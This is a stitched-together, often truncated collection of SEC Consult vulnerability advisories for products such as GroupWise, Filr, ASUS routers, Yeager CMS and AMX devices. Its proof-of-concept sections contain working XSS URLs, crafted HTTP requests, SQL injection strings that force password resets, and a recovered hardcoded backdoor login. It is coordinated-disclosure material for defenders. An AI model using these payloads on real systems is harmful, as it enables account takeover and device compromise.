Solution:
-
Update to version 4.1.2.0
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.co
SEC Consult SA-20160825-0 :: Multiple vulnerabilities in Micro Focus (Novell) GroupWise
SEC Consult Vulnerability Lab Security Advisory < 20160825-0 >
===
title: Multiple vulnerabilities
product: Micro Focus GroupWise
vulnerable version: GroupWise 2014 R2 (<=SP1)
GroupWise 2014
(unsupported versions may be affected)
fixed version: GroupWise 2014 R2 Service Pack 1 Hot Patch 1
CVE number: CVE-2016-5760, CVE-2016-5761, CVE-2016-5762
impact: critical
homepage: https://www.novell.com/products/groupwise/
found: 2016-07
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Micro Focus GroupWise is a complete collaboration software solution that
provides email, calendaring, instant messaging, task management, contact and
document management functions. GroupWise has long been praised by customers and
industry watchers for its security and reliability."
URL: https://www.novell.com/products/groupwise/
Business recommendation:
During a quick security check SEC Consult found three vulnerabilities in the
Micro Focus GroupWise server applications.
As these partly critical vulnerabilities were identified during a short time
frame SEC Consult recommends to conduct a thorough technical security audit.
Vulnerability overview/description:
---
1) Reflected cross site scripting in the administrator console (CVE-2016-5760)
Two reflected cross site scripting vulnerabilities have been identified in the
gwadmin-console application. An attacker could potentially take over an
administrator's session.
2) Persistent cross site scripting via emails (CVE-2016-5761)
By sending a single email to a victim an attacker could take over the victim's
email account. For a successful exploitation the victim has to click on a
link in an email opened in GroupWise WebAccess.
3) Heap-based Buffer Overflow / Integer Overflow (CVE-2016-5762)
By sending a crafted value for the username or the password to GroupWise
WebAccess or the GroupWise Post Office Agent during login an attacker can
overwrite heap memory. In order to exploit this vulnerability no user
authentication is required.
PLEASE NOTE: A successful exploitation of this vulnerability may allow an
attacker to execute code remotely. As SEC Consult only conducted a very quick
security check this has not been verified.
Proof of concept:
-
1) Reflected cross site scripting in the administrator console
The following links demonstrate reflected cross site scripting vulnerabilities:
https://testhost:9710/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%27xss%27%29%2b%22
https://testhost:9710/gwadmin-console/index.jsp#poa:%3Cimg%20src=x%20onerror=alert%28%27xss%27%29%3E
2) Persistent cross site scripting via emails
The following Python fragment demonstrates the generation of a hyperlink that,
when embeded into an HTML email, would, upon clicking it, open a new mail
dialog.
snip
msg = """
click me
""".replace('$charcode', ','.join(str(ord(x)) for x in list('idNewPopupMenu')))
snip
3) Heap-based Buffer Overflow / Integer Overflow
When a username or password longer than 65332 (2^16 - 3) is specified, an
overflow causes the Post Office Agent to allocate too little memory.
The following pseudocode shows how the memory to be allocated is calculated
based on the input length.
((uint16_t) (() + 3) & 0xFFFC) + 1)
Therefore, a value of 65533 would cause the application to allocate 1 byte. By
modifying this value accordingly, an attacker can cause the application to
allocate an arbitrary amount of memory.
The user-specified value is then copied into this buffer until a NUL-byte is
reached. This allows an attacker to write non-NUL bytes after the allocated
heap chunk.
Vulnerable / tested versions:
-
The version 2014 R2 SP1 of Micro Focus GroupWise was found to be
vulnerable. This version was the latest version at the time of the discovery.
Vendor contact timeline:
2016-07-05: Contacting vendor through secur...@novell.com
2016-07-06: Micro Focus was able to reproduce the vulnerabilities
2016-07-25: Micro Focus: The issues have been resolved in development
2016-08-12: Micro Focus: Hotpatch is currently undergoing QA
2016-08-25: Coordinated release of security advisory
Solution:
-
The "GroupWise 2014 R2 Service Pack 1 Hot Patch 1" should be applied
immediately. This upda
SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
===
title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846
fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
CVE-2016-1610, CVE-2016-1611
impact: critical
homepage: https://www.novell.com/products/filr/
found: 2016-05-23
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."
URL: https://www.novell.com/products/filr/
Business recommendation:
During a very quick security check several vulnerabilities with high impact
have been discovered. SEC Consult recommends to immediately apply the patches
provided by Micro Focus to address these issues.
Please note that since SEC Consult did not conduct a thorough technical security
check SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.
Vulnerability overview/description:
---
During a quick security check several vulnerabilities have been identified that
ultimately allow an attacker to completely compromise the appliance:
1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated
administrator to reconfigure the appliance.
2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to
execute arbitrary operating system commands. Please note that an attacker can
combine this vulnerability with vulnerability #1. In this scenario, an attacker
does not need to be authenticated.
3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance
administration interface. This application server is started as the superuser
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.
4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript
code from user input. However, this filter can be bypassed to persistently
inject JavaScript code into the Filr web interface.
5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the
administrative appliance web interface and the Filr web interface. Please note
that combined with vulnerability #4 an attacker can steal session cookies of
both the appliance administration interface and the Filr web interface (since
cookies are shared across ports).
For vendor remark on #5 see solution section.
6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.
7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails
to restrict the directory the templates are uploaded to. Please note that
combined with vulnerability #6 an attacker is able to upload arbitray files with
the permissions of the system user "wwwrun".
8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a
local attacker with restricted privileges to inject commands that are being
executed as privileged users as soon as they log into the system. Please note
that combined with vulnerabilities #6 and #7 an unauthenticated attacker can
inject commands that are executed as privileged system users (e.g. root) using
the Filr web interface.
Proof of concept:
-
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system
commands can be injected (#2) that are executed as the user root (#3):
- snip -
- snip -
4)
The following string demonstrates how the XSS filter can be circumvented:
This string can e.g. be used by a restricted user in the "phone" field of the
user prof
SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and information disclosure
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
===
title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
vulnerable version: 3.0.0.4.376_2736
fixed version: 3.0.0.4_380_3679
CVE number: requested
impact: Medium
homepage: https://www.asus.com/
found: 2016-04-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."
Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS
Business recommendation:
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
---
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.
If the web path is longer than 50 characters, it will redirect a user to
the cloud_sync.asp page with the web path as a value of a GET parameter.
Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.
No authentication is required.
2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including
the hostname and private IP addresses of the local machines connected to the
router from the WAN IP address.
Proof of concept:
-
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111'+alert('XSS')+' HTTP/1.1
Host:
HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
location.href='/cloud_sync.asp?flag=111'+alert('XSS')+'';
2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host:
HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['', ''],['',
''],['', '']];;
function initial(){
[...]
Vulnerable / tested versions:
-
The following firmware has been tested which was the most recent version
at the time of discovery:
- 3.0.0.4.376_2736 (2015/01/19 update)
URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/
Vendor contact timeline:
2016-06-02: Contacting vendor through priv...@asus.com and netad...@asus.com.tw.
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.
Solution:
-
Upgrade to firmware version 3.0.0.4_380_3679 or later.
Workaround:
---
No workaround available.
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: r
SEC Consult SA-20160602-0 :: Multiple critical vulnerabilities in Ubee EVW3226 Advanced wireless voice gateway
SEC Consult Vulnerability Lab Security Advisory < 20160602-0 >
===
title: Multiple critical vulnerabilities
product: Ubee EVW3226 Advanced wireless voice gateway
vulnerable version: Firmware EVW3226_1.0.20
fixed version: -
CVE number: -
impact: critical
homepage: http://www.ubeeinteractive.com
found: 2016-01-09
by: Manuel Hofer (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubee Interactive is on a mission. A mission that began with the development
of our industry-defining line of DOCSIS cable modems. And one that continues
with a drive toward becoming the leading business-to-business provider of
broadband connectivity products and solutions worldwide. Our current product
portfolio includes data, voice, video, mobility and portable devices."
Source: http://www.ubeeinteractive.com/products/cable/evw3226
Business recommendation:
Network security should not depend on the security of independent devices, such
as cable modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other cable modem users.
Vulnerabilities described in this security advisory might be exploited in
combination with other vulnerabilities not associated with this product (XSS in
web forums accessing the modem, malvertising, etc.).
It is highly recommended by SEC Consult not to use this device until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
It is assumed that further critical vulnerabilities exist within the firmware
of this device.
Vulnerability overview/description:
---
1) Missing authentication for configuration download
The admin interface does not explicitly require any authentication prior to
downloading a previously requested configuration backup file.
2) Plaintext storage of administrative password
The password for the user "admin" is stored in clear text. An attacker with
access to the configuration file or the device itself, can easily obtain this
password. By exploiting issue 1) the clear text admin password can be retrieved.
3) "Encrypted" configuration backup not actually encrypted
A certain built in cgi action [removed] asks the user to provide a password in
order to "encrypt your configuration's backup". A quick analysis of this
function has shown that the configuration backup does not actually get
encrypted,
and only a file "pass.txt" is appended to the archive containing the password
provided by the user, in cleartext. Additionally, this promotes a false sense of
security as in this case, an attacker with access to the configuration file can
easily obtain the clear text password for the admin interface.
4) Authenticated arbitrary file upload leading to arbitrary command execution
By analyzing the configuration file format and further exploiting a known
vulnerability inside the busybox tar implementation it is possible to upload
arbitrary files to the device. This enables an attacker to execute arbitrary
system commands and gain full root access on the device.
5) Heap-based buffer overflow vulnerability in URL decoding
The function responsible for URL decoding allocates the buffer for the decoded
string based on the number of '%' characters in the request string. This leads
to a heap based buffer overflow.
Proof of concept:
-
Since no public fix is available for any of the described vulnerabilities yet,
the proof of concept will not be published.
Vulnerable / tested versions:
-
The following firmware has been tested which was the most recent version
at the time of discovery:
EVW3226_1.0.20
Vendor contact timeline:
2016-01-13: Contacting CERT.at for security contact of
UPC Austria (Liberty Global)
2016-01-17: Contacting vendor Ubee Interactive through
'eusupp...@ubeeinteractive.com' and 'eusa...@ubeeinteractive.com'
requesting security contact.
2016-01-17: Disclosure of identified vulnerabilities to UPC Austria in advance.
2016-01-20: No reply from Ubee Interactive. Requesting direct contact through
UPC Austria.
2016-01-22: Received contact at Ubee Interactive. Establishing contact with
<michael@ubeeinteractive.com> again asking for public key to
sen
SEC Consult SA-20160422-1 :: Multiple vulnerabilities in Digitalstrom Konfigurator
SEC Consult Vulnerability Lab Security Advisory < publishing date 20160422-1 >
===
title: Multiple vulnerabilities in Digitalstrom Konfigurator
product: Digitalstrom Konfigurator
vulnerable version: 1.10.0
fixed version: 1.10.4
CVE number: -
impact: High
homepage: http://www.digitalstrom.com/
found: 2015-10-01
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Digitalstrom is designed to systematically network all the electrical devices
in your home. The control of light ambiances, security technology and
household devices is just the start. You can simply download these new
functions to your Digitalstrom server; they will install themselves
automatically. And tomorrow has already become today."
Source: http://www.digitalstrom.com/en/idea/Good-morning/
Business recommendation:
SEC Consult recommends every user to sign out immediately after configuring
the Digitalstrom installation in the Digitalstrom Konfigurator. This should
prevent cross-site request forgery attacks. Furthermore every user should be
aware that an attack could occure everytime when he clicks on an unknown link.
However, SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Digitalstrom Konfigurator and increase the
security of its customers.
Vulnerability overview/description:
---
1) Multiple Persistent Cross-Site Scripting
Digitalstrom Konfigurator suffers from multiple cross-site scripting
vulnerabilities, which allow stealing session tokens and impersonation of
other users in order to gain unauthorized access to the web interface.
Furthermore it is possible to alter the contents of the interface in the
context of the current user.
2) Cross-Site Request Forgery
Digitalstrom Konfigurator doesn't implement any kind of cross-site request
forgery protection. Due to that, attackers are able to execute arbitrary
requests with the privileges of any user. The only requirement is, that a
victim visits a malicious webpage. For example, an administrator can be
forced to execute unwanted actions. Some of these actions are:
-) Change network configuration
-) Enable SSH service
-) Turn various devices on and off
Proof of concept:
-
Has been removed due to the request from the vendor.
Vulnerable / tested versions:
-
Digitalstrom Konfigurator 1.10.0
Vendor contact timeline:
2015-11-09: Transmission of advisory via email
2015-12-02: As requested by Digitalstrom: New PoC for XSS
2016-01-31: Vendor released updated version 1.10.4
2016-04-22: Public advisory release
Solution:
-
Upgrade to version 1.10.4.
The effectiveness of the vendor's update was not verified by the SEC Consult
Vulnerability Lab.
Workaround:
---
no workaround available
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Schober / @2015
signature.asc
Description: OpenPGP digital signature
SEC Consult SA-20160422-0 :: Insecure credential storage in my devolo Android app
SEC Consult Vulnerability Lab Security Advisory < 20160422-0 >
===
title: Insecure data storage
product: my devolo - android application - air.de.devolo.my.devolo
vulnerable version: 1.2.8
fixed version:
CVE number:
impact: High
homepage: http://www.devolo.com/
found: 2015-10-30
by: A. Nochvay (Office Moscow)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
devolo AG has been developing innovative Powerline and data communications
products for private customers and professional users.devolo Home Control
expands on the idea of the easy way to connect and is emerging as a new
product world for the smart home that simply enables greater comfort and
convenience, security and energy savings.
URL: http://www.devolo.com/en/Company/devolo-AG
Business recommendation:
Attackers might be able to recover sensitive information from stolen/lost
devices.
With this information attackers can control user's smart devices, change
temperature and watching user's remote camera.
SEC Consult recommends not to store sensitive information on mobile devices.
Vulnerability overview/description:
---
The application "my devolo" uses the SharedPreferences android mechanism for
storing information about the user including login credentials for the site
mydevolo.com. In the event that an adversary physically attains the mobile
device, the adversary might be able to hook up the mobile device to a computer
with freely available software. These tools allow the adversary to see all third
party application directories.
Proof of concept:
-
Has been removed due to the request from the vendor.
Vulnerable / tested versions:
-
The vulnerability has been discovered in "my devolo" version 1.2.8, which
is the latest version in Google Play Store at this time.
Vendor contact timeline:
2015-11-10: Transmission of advisory via a data-exchange platform provided by
the vendor
2016-02-23: Confirmation of the described issue via email by vendor
2016-04-22: Public advisory release
Solution:
-
no solution available
Workaround:
---
no workaround available
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Aleksandr Nochvay / @2015
signature.asc
Description: OpenPGP digital signature
SEC Consult SA-20160210-0 :: Yeager CMS Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
===
title: Multiple Vulnerabilities
product: Yeager CMS
vulnerable version: 1.2.1
fixed version: 1.3
CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570
,
CVE-2015-7571, CVE-2015-7572
impact: Critical
homepage: http://yeager.cm/en/home/
found: 2015-11-18
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
- ---
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.
Business recommendation:
-
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
1. Change user's passwords including the administrator's account.
2. Gain full access to the Yeager CMS database.
3. Determine internal servers that inaccessible from the Internet.
4. Attack other users of the Yeager CMS with Cross-Site Scripting.
SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
- ---
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)
Proof of concept:
- -
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
http:///yeager/?action=passwordreset=
http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70
=["noevent",{"yg_property":"setNewPassword","params":{"userToken":""}}]
The vulnerability can also be used for unauthorized reset password of any user.
In order to reset a specific user's password, an attacker will need to provide
a valid email address of the user that he wants to attack.
The email can be retrieved by either social engineering or using the
aforementioned unauthenticated SQL injection vulnerability.
http:///yeager/y.php/responder?handler=recoverLogin=sess_2=70
ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@ema
il.com>","winID":"1"}}]
The above URL just simply creates and sends a reset password token to the
user's email. Next, even if attacker does not know the token,
manipulating SQL commands allows to force to set the new password instantly.
Note that new password MUST be at least 8 characters in length
and must contain both letters and numbers.
http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70
=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+ui
d=(select+id+from+yg_user+where+login='<vic...@email.com>')+limit+1--+-","userP
assword":"","winID":"1"}}]
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
http:///yeager/y.php/tab_USERLIST
POST Data:
win_no=4_id=2-user_type=user=wid_4=1==sess_16000&
lh=325_page=2_perpage=1_orderby=_orderdir=4_from=5_limit=6,7=1
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known Arbitrary File Upload vulnerability of Plupload was found in
Yeager CMS.
Fortunately, to successfully exploit the vulnerability requires PHP directive
"upload_tmp_dir" set to an existing directory and it must contain the writable
directory "plupload".
By default, the PHP directive "upload_tmp_dir" is an empty value.
As a result, the script will attempt to upload a file to /plupload/ instead
which generally does not exist on the filesystem.
http:///yeager/ui/js/3rd/plupload/examples/upload.php
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http:///yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php
The parameter "dbhost" can be used to perform internal port scan using
SEC Consult SA-20160121-0 :: Deliberately hidden backdoor account in AMX (Harman Professional) devices
Disclaimer:
Although the backdoor vulnerability is quite a serious matter, we
have published an accompanying blog post to this technical advisory
which sheds a more funny light on this topic. Visit our blog at
http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in.html
for more information.
SEC Consult Vulnerability Lab Security Advisory < 20160121-0 >
===
title: Deliberately hidden backdoor account
product: Several AMX (HARMAN Professional) devices, see
section "Vulnerable / tested versions"
vulnerable version: v1.2.322, v1.3.100 for AMX NX-1200, multiple other products
fixed version: untested hotfix and firmware updates available
CVE number: CVE-2015-8362
impact: critical
homepage: http://www.amx.com
found: 2015-03-10
by: Matthias Klinski, Manuel Hofer (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"AMX® (www.amx.com) is part of the HARMAN Professional Division, and the
leading brand for the business, education, and government markets for the
company. As such, AMX is dedicated to integrating AV solutions for an IT World.
AMX solves the complexity of managing technology with reliable, consistent and
scalable systems comprising control and automation, system-wide switching and
AV signal distribution, digital signage and technology management. AMX systems
are deployed worldwide in conference rooms, homes, classrooms, network
operation/command centers, hotels, entertainment venues and broadcast
facilities, among others."
Source: http://www.amx.com/automate/aboutamx.aspx
Business recommendation:
Attackers are able to completely compromise the affected devices as they can
gain higher privileges than even administrative access to the system via the
backdoor.
It is highly recommended by SEC Consult not to use these products until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
---
1) Deliberately hidden backdoor account
While analysing the application binary /bin/bw, SEC Consult discovered a
function called "setUpSubtleUserAccount" which adds an administrative
account to the internal user database. This account can be used to log on to
the web interface as well as SSH.
Functions to retrieve a list of all users in the database were found to
deliberately hide this user. Further, using this backdoor account grants
additional features on the remote-cli, such as a facility to capture packets
on the network interface which not even an administrator account can perform.
Proof of concept:
-
The binary /bin/bw which provides core functionality as well as user management
for the AMX NX-1200 implements a function called "setUpSubtleUserAccount",
which is called on system boot. This function adds an administrative account
with hardcoded credentials to the user database:
STMFD SP!, {R4-R7,LR}
LDR R4, =aMu1cqhrnyu4 ; "QmxhY2tXaWRvdw"
SUB SP, SP, #0x44
ADD R12, R4, #0x38
ADD LR, SP, #0x58+cSubtleUserPassword
MOV R5, this
LDMIA R12!, {this-R3} ; ""
STMIA LR!, {R0-R3}
ADD R3, R4, #0x54
LDMIA R12, {R0,R1}
MOV R4, #0
ADD R12, SP, #0x58+cSubtleUserUserName+0x10
STR R0, [LR],#4
STRBR4, [R12],#1
STRHR1, [LR],#2
ADD R6, SP, #0x58+cSubtleUserUserName
By decoding the strings which are loaded from memory and passed as arguments to
cSubtleUserPassword and cSubtleUserUserName, the following user and password
can be recovered:
user: BlackWidow
password:
Using these credentials a successful login has been performed to the web based
management interface, as well as the command line interface. Using this
backdoor account grants additional features on the command line interface, such
as capturing packets on the network interface.
Parts of the application which display a list of users are designed to
deliberately hide the backdoor account.
The backdoor did not get removed by AMX in their first patch, but the backdoor
username has only been changed to a DC superhero name.
The new username now was: 1MB@tMaN
The hotfix from 2016-01-15 is untested by SEC Consult and it is unknown
whether the backdoor has been removed properly now. Hence the password will
not be published.
Vulnerable / tested versions:
-
The following software versions of the
SEC Consult whitepaper: Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems
SEC Consult Vulnerability Lab released a new whitepaper titled: "Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems" - the dinosaurs want their vuln back Link to blog overview: -- Including slides from presentations on this topic (with details & demos on vulnerabilites & vendor responses): http://blog.sec-consult.com/2016/01/mcafee-application-control-dinosaurs.html Direct link to whitepaper: --- https://www.sec-consult.com/fxdata/seccons/prod/media/Whitepaper_Bypassing_McAfees_Application_Whitelisting_for_critical_infrastructure_systems_v1%200.pdf Abstract: - This paper describes the results of the research conducted by SEC Consult Vulnerability Lab on the security of McAfee Application Control. This product is an example of an application whitelisting solution which can be used to further harden critical systems such as server systems in SCADA environments or client systems with high security requirements like administrative workstations. Application whitelisting is a concept which works by whitelisting all installed software on a system and after that prevent the execution of not whitelisted software. This should prevent the execution of malware and therefore protect against advanced persistent threat (APT) attacks. McAfee Application Control is an example of such a software. It can be installed on any system, however, the main field of application is the protection of highly critical infrastructures. While the core feature of the product is application whitelisting, it also supports additional security features including write- and read-protection as well as different memory corruption protections. The paper will show: * how application whitelisting can be bypassed in multiple ways * how User-Account-Control can be bypassed on such protected systems * how additional protections such as read- or write-protections can be bypassed * how additional memory corruption protections can easily be bypassed * that the software can decrease the overall security of your operating system ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult smime.p7s Description: S/MIME Cryptographic Signature
SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
===
title: Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
CVE number:
impact: Critical
homepage: www.skyboxsecurity.com/products/appliance
found: 2014-12-04
